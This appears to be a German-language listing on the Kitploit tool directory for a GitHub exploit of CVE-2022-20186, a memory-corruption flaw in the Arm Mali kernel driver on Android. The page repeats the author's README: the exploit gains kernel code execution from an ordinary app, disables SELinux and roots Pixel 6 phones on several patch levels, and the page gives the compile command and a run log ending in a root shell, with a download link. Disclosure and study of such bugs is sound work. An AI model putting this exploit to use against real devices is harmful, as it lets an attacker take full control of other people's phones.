Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-20186_CTXZ — Exploit für CVE-2022-20186, der auf die Speicherkorruption des Arm Mali-Kernel-Treibers unter Android abzielt. Erlangt beliebige Kernel-Codeausführung, deaktiviert SELinux und eskaliert zu Root auf Pixel 6 mit Unterstützung für mehrere Firmware-Versionen. | Kitploit
Tools/GitHubGitHub/bariskizilkaya/cve-2022-20186_ctxz
Android-SicherheitPrivilege EscalationSchwachstellenanalyseExploitationMobile SicherheitBinary-Exploitation
GitHubbariskizilkaya/cve-2022-20186_ctxz

CVE-2022-20186_CTXZ

Exploit für CVE-2022-20186, der auf die Speicherkorruption des Arm Mali-Kernel-Treibers unter Android abzielt. Erlangt beliebige Kernel-Codeausführung, deaktiviert SELinux und eskaliert zu Root auf Pixel 6 mit Unterstützung für mehrere Firmware-Versionen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
32vor 3 JahrenNoch nicht geprüft

Exploit für CVE-2022-20186

Der Write-up ist hier zu finden. Es handelt sich um einen Fehler im Arm-Mali-Kernel-Treiber, den ich im Januar 2022 gemeldet habe. Der Fehler kann genutzt werden, um aus der unsicheren App-Domäne (untrusted app domain) eine beliebige Kernel-Codeausführung zu erlangen, mit der dann SELinux deaktiviert und Root-Rechte erlangt werden.

Der Exploit wurde auf dem Google Pixel 6 getestet und unterstützt Patch-Level von November 2021 bis Februar 2022. Es ist einfach, durch Ändern einiger Image-Offsets Unterstützung für andere Firmware-Versionen hinzuzufügen. Als Referenz habe ich den folgenden Befehl verwendet, um mit clang in ndk-21 zu kompilieren:

root@kitploit:~
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang mali_alias.c -o mali_alias

Der Exploit schlägt selten fehl und kann ohne Absturz des Geräts wiederholt werden. Im Erfolgsfall sollte er SELinux deaktivieren und Root-Rechte gewähren.

root@kitploit:~
oriole:/ $ /data/local/tmp/mali_alias                                                                                             
fingerprint: google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys
tracking page 0x6ff794e000
drain 0x6d5b200000
gpu_va[0] 6ff6698000
gpu_va[1] 6ff6695000
alias 0x6ff6693000
overwrite addr : 6ff370051c 51c
overwrite addr : 6de310051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
result 50
overwrite addr : 6ff370051c 51c
overwrite addr : 6de310051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
overwrite addr : 6d5f30051c 51c
overwrite addr : 6d5f10051c 51c
result 50
oriole:/ # 
Tool herunterladen